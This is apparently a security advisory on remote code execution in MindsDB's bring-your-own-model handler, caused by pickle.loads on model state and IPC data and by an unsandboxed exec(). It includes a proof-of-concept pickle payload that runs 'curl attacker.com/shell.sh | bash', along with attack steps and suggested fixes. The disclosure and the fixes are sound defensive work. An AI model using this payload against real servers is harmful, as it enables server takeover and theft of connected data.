
MindsDB: RCE via pickle.loads() in BYOM (Bring Your Own Model) Handler

Vulnerability Type

CWE-502: Deserialization of Untrusted Data

Severity

Critical: any user who can create a BYOM model achieves Remote Code Execution on the MindsDB server.

Affected Code

File: mindsdb/integrations/handlers/byom_handler/byom_handler.py

Three functions deserialize user-controlled model state:

# Line 398 - predict()
def predict(self, df, model_state, args):
    model_state = pickle.loads(model_state)  # ← RCE
    self.model_instance.__dict__ = model_state

# Line 407 - finetune()
def finetune(self, df, model_state, args):
    self.model_instance.__dict__ = pickle.loads(model_state)  # ← RCE

# Line 419 - describe()
def describe(self, model_state, attribute=None):
    model_state = pickle.loads(model_state)  # ← RCE
    self.model_instance.__dict__ = model_state

Also affected:

mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:55:

model_state = pickle.loads(model_state)  # subprocess wrapper

mindsdb/interfaces/query_context/context_controller.py:275:

steps_data = pickle.loads(data)  # from cache

mindsdb/integrations/libs/process_cache.py:45:

# IPC via pickle - exception propagation

Attack Chain

  1. The attacker creates a BYOM model via MindsDB SQL:
CREATE MODEL pwned
PREDICT target
USING engine='byom',
      code='class Model: pass';
  2. The model's train() is expected to return pickle.dumps(self.__dict__), but an attacker who controls the model code can make train() return arbitrary bytes, including a malicious pickle payload.

  3. When predict() is called (e.g., SELECT * FROM pwned WHERE ...), the server deserializes the stored model state with pickle.loads(model_state) → arbitrary code execution.
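The shape of such a malicious model can be sketched as follows. This is hypothetical illustrative code, not MindsDB source; a benign callable (abs) stands in for os.system to show that whatever callable the payload names runs during deserialization:

```python
import pickle

class Payload:
    def __reduce__(self):
        # A real attacker would return (os.system, ("...",)); abs is a
        # benign stand-in proving an arbitrary callable runs at load time.
        return (abs, (-5,))

class Model:
    def train(self, df, args):
        # The handler expects pickled model state back; nothing validates
        # that these bytes actually came from self.__dict__.
        return pickle.dumps(Payload())

    def predict(self, df, args):
        return df

state = Model().train(None, None)
print(pickle.loads(state))  # -> 5 : the payload's callable ran inside loads()
```

Server-side, the equivalent pickle.loads(model_state) call in predict() would invoke the attacker's callable the same way.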

Alternative: Direct state injection

If the attacker has access to the MindsDB storage backend (database), they can directly replace the model state bytes with a malicious pickle:

import pickle, os
class Exploit:
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell.sh | bash',))

malicious_state = pickle.dumps(Exploit())
# Insert into model storage → next predict() = RCE
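A payload like the one above can be verified without executing it: pickletools.dis disassembles the byte stream, making the reference to os.system visible while running none of it (a harmless triage technique, not part of the exploit):

```python
import io
import os
import pickle
import pickletools

class Exploit:
    def __reduce__(self):
        return (os.system, ("echo pwned",))

blob = pickle.dumps(Exploit())

# Disassemble instead of loading - pickletools.dis executes no opcodes
out = io.StringIO()
pickletools.dis(blob, out=out)
print("system" in out.getvalue())  # -> True : the os.system global is visible
```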

AI Impact (10x Multiplier)

MindsDB is an AI-in-database platform. The BYOM handler is specifically designed for users to bring custom ML models. Compromising it enables:

  • Model poisoning - replace a legitimate model with a backdoored version
  • Training data exfiltration - RCE exposes all data MindsDB can read
  • Database compromise - MindsDB connects to user databases (MySQL, PostgreSQL, etc.); RCE grants access to all connected data sources
  • Supply chain - a poisoned model persists across restarts and affects all queries

Known CVE Context

MindsDB has prior deserialization CVEs (CVE-2024-45846, CVE-2024-45847 - eval injection via the Weaviate integration). This BYOM pickle.loads is a different, previously unreported vector.

Suggested Fix

Replace pickle.loads with a safe alternative:

import io
import json

def predict(self, df, model_state, args):
    # JSON-based deserialization carries data only - it cannot instantiate
    # arbitrary objects the way pickle can. It requires the model state to
    # be restricted to JSON-serializable types.
    model_state = json.loads(model_state)
    # Or keep pickle but restrict which globals may be resolved:
    # model_state = RestrictedUnpickler(io.BytesIO(model_state)).load()
    self.model_instance.__dict__ = model_state
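A minimal restricted unpickler along the lines the comment suggests, using the find_class override pattern from the Python pickle documentation (the allowlist here is illustrative, not a vetted policy):

```python
import builtins
import io
import pickle

# Illustrative allowlist - extend only with types known to be safe
SAFE_BUILTINS = {"list", "dict", "set", "tuple", "frozenset",
                 "str", "int", "float", "bool", "bytes"}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Refuse every global lookup except allowlisted builtins, so a
        # payload's __reduce__ cannot resolve os.system or similar.
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")

def restricted_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()
```

Plain data (dicts, lists, scalars) round-trips normally, while any pickle that references a non-allowlisted global fails at load with UnpicklingError before the callable can run.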

Invariant Violated

S16 (DeserializationGuard): Application MUST NOT use pickle.loads on data from user-controlled or shared storage.

Additional Finding: Direct exec() on User Model Code

File: mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80

def import_string(code, module_name='model'):
    module = types.ModuleType(module_name)
    exec(code, module.__dict__)  # ← Direct code execution, NO sandbox
    return module

This is the execution path for BYOM models. When a user creates a model with engine='byom', their Python code is passed to import_string(), which calls exec() with no sandboxing, no AST filtering, and no import restrictions.
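exec() on attacker-supplied source cannot be made safe by filtering alone, but an AST pre-check at least raises the bar. A sketch follows; the function name and module blocklist are assumptions for illustration, not MindsDB code, and such filtering is bypassable (e.g. via __import__ or getattr tricks), so real isolation still requires an OS-level sandbox around the worker process:

```python
import ast

BLOCKED_MODULES = {"os", "subprocess", "ctypes", "socket", "importlib"}  # illustrative

def check_model_code(code: str) -> None:
    """Reject obviously dangerous imports before exec(). Defense-in-depth
    only - this does not make exec() safe on hostile input."""
    for node in ast.walk(ast.parse(code)):
        if isinstance(node, ast.Import):
            roots = [alias.name.split(".")[0] for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            roots = [(node.module or "").split(".")[0]]
        else:
            continue
        blocked = [r for r in roots if r in BLOCKED_MODULES]
        if blocked:
            raise ValueError(f"blocked import(s) in model code: {blocked}")

check_model_code("import math\nx = math.pi")   # passes silently
```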

The same file also uses pickle.loads() for IPC (stdin/stdout between parent and worker):

def decode(encoded):
    return pickle.loads(encoded)  # Line 55

def get_input():
    with open(0, 'rb') as fd:
        encoded = fd.read()
        obj = decode(encoded)  # pickle.loads on stdin
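If the IPC payloads between parent and worker are plain data, the pickle channel could be swapped for JSON. A sketch under that assumption (structured objects such as DataFrames would need explicit conversion first):

```python
import json

def encode(obj) -> bytes:
    # JSON represents only data (dicts, lists, scalars), so a compromised
    # worker cannot smuggle code objects back through this channel.
    return json.dumps(obj).encode("utf-8")

def decode(encoded: bytes):
    return json.loads(encoded.decode("utf-8"))

print(decode(encode({"status": "ok"})))  # -> {'status': 'ok'}
```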

Combined Chain

  1. A user creates a BYOM model with malicious code → exec(code) → RCE
  2. Even if exec were sandboxed, the pickle IPC channel is unprotected → pickle.loads bypass

This is a defense-in-depth failure: two independent RCE vectors in the same module.
